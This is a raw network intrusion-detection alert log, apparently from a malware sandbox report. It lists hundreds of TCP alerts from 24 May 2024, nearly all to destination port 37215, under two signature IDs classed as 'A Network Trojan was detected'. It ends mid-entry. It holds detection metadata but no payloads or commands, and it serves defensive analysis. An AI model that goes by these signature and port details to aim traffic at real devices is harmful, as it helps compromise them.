              Timestamp:05/24/24-10:59:08.642203
              SID:2835222
              Source Port:54084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727031
              SID:2835222
              Source Port:45120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279801
              SID:2835222
              Source Port:57724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536018
              SID:2835222
              Source Port:33980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.515517
              SID:2829579
              Source Port:38724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519089
              SID:2829579
              Source Port:39288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098139
              SID:2829579
              Source Port:44706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.761851
              SID:2835222
              Source Port:41726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.065727
              SID:2835222
              Source Port:33984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486435
              SID:2835222
              Source Port:51720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494348
              SID:2835222
              Source Port:42040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692454
              SID:2835222
              Source Port:50284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153171
              SID:2835222
              Source Port:35270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098899
              SID:2835222
              Source Port:52552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.077012
              SID:2835222
              Source Port:35166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.756320
              SID:2829579
              Source Port:41906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.378122
              SID:2835222
              Source Port:60766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.108545
              SID:2829579
              Source Port:49752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431275
              SID:2829579
              Source Port:60728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522590
              SID:2829579
              Source Port:35960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400774
              SID:2829579
              Source Port:42076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574007
              SID:2829579
              Source Port:59718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358623
              SID:2829579
              Source Port:56184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.206473
              SID:2835222
              Source Port:43488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396696
              SID:2835222
              Source Port:56198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578699
              SID:2829579
              Source Port:38526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368551
              SID:2829579
              Source Port:35254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358855
              SID:2829579
              Source Port:44492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232650
              SID:2829579
              Source Port:51940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727035
              SID:2829579
              Source Port:33424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.804545
              SID:2835222
              Source Port:34706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478259
              SID:2835222
              Source Port:55472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866343
              SID:2835222
              Source Port:37292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.864930
              SID:2829579
              Source Port:41932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.118167
              SID:2829579
              Source Port:33114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433774
              SID:2835222
              Source Port:45872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.158793
              SID:2835222
              Source Port:49116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.197377
              SID:2829579
              Source Port:58218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:21.652069
              SID:2030490
              Source Port:41602
              Destination Port:1235
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062560
              SID:2835222
              Source Port:60432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100636
              SID:2835222
              Source Port:45188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.431405
              SID:2829579
              Source Port:44082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572701
              SID:2829579
              Source Port:33820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485240
              SID:2829579
              Source Port:47556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.603809
              SID:2835222
              Source Port:58454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078152
              SID:2829579
              Source Port:55192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431615
              SID:2829579
              Source Port:39620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.677360
              SID:2829579
              Source Port:58056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.880819
              SID:2829579
              Source Port:58202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.071546
              SID:2829579
              Source Port:48038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799004
              SID:2835222
              Source Port:39886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.629455
              SID:2829579
              Source Port:38368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152559
              SID:2835222
              Source Port:39826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575232
              SID:2829579
              Source Port:59434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099577
              SID:2835222
              Source Port:35862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.070200
              SID:2829579
              Source Port:55826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186422
              SID:2829579
              Source Port:33308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.803013
              SID:2829579
              Source Port:56846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400467
              SID:2835222
              Source Port:52616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538653
              SID:2829579
              Source Port:34074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624339
              SID:2835222
              Source Port:57836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053629
              SID:2835222
              Source Port:47728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341588
              SID:2835222
              Source Port:49072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596167
              SID:2835222
              Source Port:49748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148757
              SID:2829579
              Source Port:54286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.591894
              SID:2829579
              Source Port:39272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638277
              SID:2835222
              Source Port:42954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551794
              SID:2829579
              Source Port:60160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.987454
              SID:2829579
              Source Port:38952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.149223
              SID:2835222
              Source Port:56948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866345
              SID:2829579
              Source Port:41622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.041042
              SID:2835222
              Source Port:44690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233695
              SID:2829579
              Source Port:55392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.583942
              SID:2829579
              Source Port:46206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060942
              SID:2835222
              Source Port:40286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282279
              SID:2829579
              Source Port:33894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.747826
              SID:2829579
              Source Port:50622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724909
              SID:2829579
              Source Port:57336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.364325
              SID:2829579
              Source Port:60202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103493
              SID:2835222
              Source Port:58948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.406560
              SID:2835222
              Source Port:34340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.123416
              SID:2829579
              Source Port:34444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061230
              SID:2835222
              Source Port:45310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522354
              SID:2835222
              Source Port:34496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.818040
              SID:2835222
              Source Port:51326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456834
              SID:2835222
              Source Port:39454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313701
              SID:2829579
              Source Port:60878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.972389
              SID:2829579
              Source Port:40070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549906
              SID:2835222
              Source Port:35730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.347078
              SID:2829579
              Source Port:38426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456416
              SID:2835222
              Source Port:58214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534425
              SID:2835222
              Source Port:33752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457733
              SID:2835222
              Source Port:41440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.355151
              SID:2835222
              Source Port:38342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.544136
              SID:2829579
              Source Port:52482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520119
              SID:2829579
              Source Port:41794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459765
              SID:2829579
              Source Port:42374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.161726
              SID:2835222
              Source Port:38520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270599
              SID:2835222
              Source Port:45460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061484
              SID:2829579
              Source Port:44038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150953
              SID:2829579
              Source Port:40700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.455299
              SID:2829579
              Source Port:46134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246574
              SID:2835222
              Source Port:47086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.525201
              SID:2835222
              Source Port:60692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449183
              SID:2829579
              Source Port:46482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.704953
              SID:2835222
              Source Port:45762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.594608
              SID:2835222
              Source Port:39570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.107881
              SID:2835222
              Source Port:45490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279896
              SID:2835222
              Source Port:55596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189524
              SID:2835222
              Source Port:36026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.285911
              SID:2835222
              Source Port:59104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.390733
              SID:2835222
              Source Port:49566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431536
              SID:2835222
              Source Port:43138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446337
              SID:2829579
              Source Port:52008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116665
              SID:2829579
              Source Port:59982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.924316
              SID:2829579
              Source Port:47186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162183
              SID:2829579
              Source Port:58260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.546959
              SID:2835222
              Source Port:45094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099620
              SID:2835222
              Source Port:43680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300308
              SID:2835222
              Source Port:51104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.743056
              SID:2835222
              Source Port:43890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542927
              SID:2835222
              Source Port:56254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208981
              SID:2829579
              Source Port:34896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.814653
              SID:2829579
              Source Port:33264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506154
              SID:2835222
              Source Port:34538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.391657
              SID:2835222
              Source Port:43086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483773
              SID:2829579
              Source Port:34276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.546090
              SID:2829579
              Source Port:34092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284019
              SID:2829579
              Source Port:57710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662510
              SID:2835222
              Source Port:42548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517378
              SID:2835222
              Source Port:52414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459068
              SID:2829579
              Source Port:42102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695062
              SID:2835222
              Source Port:56906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.540761
              SID:2829579
              Source Port:40014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530905
              SID:2835222
              Source Port:55234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726366
              SID:2835222
              Source Port:51134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231565
              SID:2829579
              Source Port:39858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636254
              SID:2829579
              Source Port:45640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.061620
              SID:2829579
              Source Port:46930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575314
              SID:2829579
              Source Port:40758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574722
              SID:2829579
              Source Port:38740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.073522
              SID:2829579
              Source Port:34756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549289
              SID:2835222
              Source Port:58498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.881811
              SID:2829579
              Source Port:33754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097739
              SID:2829579
              Source Port:53984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162985
              SID:2835222
              Source Port:50792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.391328
              SID:2829579
              Source Port:51530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988518
              SID:2829579
              Source Port:54528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926736
              SID:2835222
              Source Port:52404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483794
              SID:2835222
              Source Port:59866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640374
              SID:2829579
              Source Port:56042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485912
              SID:2829579
              Source Port:41164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.584482
              SID:2829579
              Source Port:52262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.421619
              SID:2835222
              Source Port:44454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128247
              SID:2829579
              Source Port:49594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150786
              SID:2835222
              Source Port:37726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.576486
              SID:2835222
              Source Port:57984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.111917
              SID:2835222
              Source Port:39768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.879310
              SID:2835222
              Source Port:39206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059476
              SID:2829579
              Source Port:36456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431229
              SID:2829579
              Source Port:51762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.641567
              SID:2835222
              Source Port:43090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.994035
              SID:2835222
              Source Port:40842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664475
              SID:2835222
              Source Port:45724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494304
              SID:2835222
              Source Port:46230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636621
              SID:2835222
              Source Port:46358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520183
              SID:2835222
              Source Port:41000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727072
              SID:2835222
              Source Port:41000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151243
              SID:2835222
              Source Port:42528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.705216
              SID:2829579
              Source Port:45366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098680
              SID:2829579
              Source Port:54826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246151
              SID:2835222
              Source Port:48406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537442
              SID:2835222
              Source Port:34274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.581825
              SID:2835222
              Source Port:34110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062275
              SID:2829579
              Source Port:47824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062275
              SID:2829579
              Source Port:49724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118971
              SID:2829579
              Source Port:33256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.462808
              SID:2829579
              Source Port:38326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116002
              SID:2829579
              Source Port:56772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101543
              SID:2835222
              Source Port:46374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491756
              SID:2835222
              Source Port:51400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395113
              SID:2835222
              Source Port:52876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397747
              SID:2835222
              Source Port:57940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507459
              SID:2835222
              Source Port:42212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.462819
              SID:2829579
              Source Port:56258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.641552
              SID:2835222
              Source Port:54402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542900
              SID:2835222
              Source Port:38676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245566
              SID:2835222
              Source Port:37726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377439
              SID:2829579
              Source Port:33680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.970959
              SID:2835222
              Source Port:40558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329704
              SID:2829579
              Source Port:36620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578816
              SID:2835222
              Source Port:43318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552323
              SID:2835222
              Source Port:49396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343485
              SID:2835222
              Source Port:50578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.248940
              SID:2835222
              Source Port:44908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623370
              SID:2829579
              Source Port:37912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535468
              SID:2829579
              Source Port:57916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360872
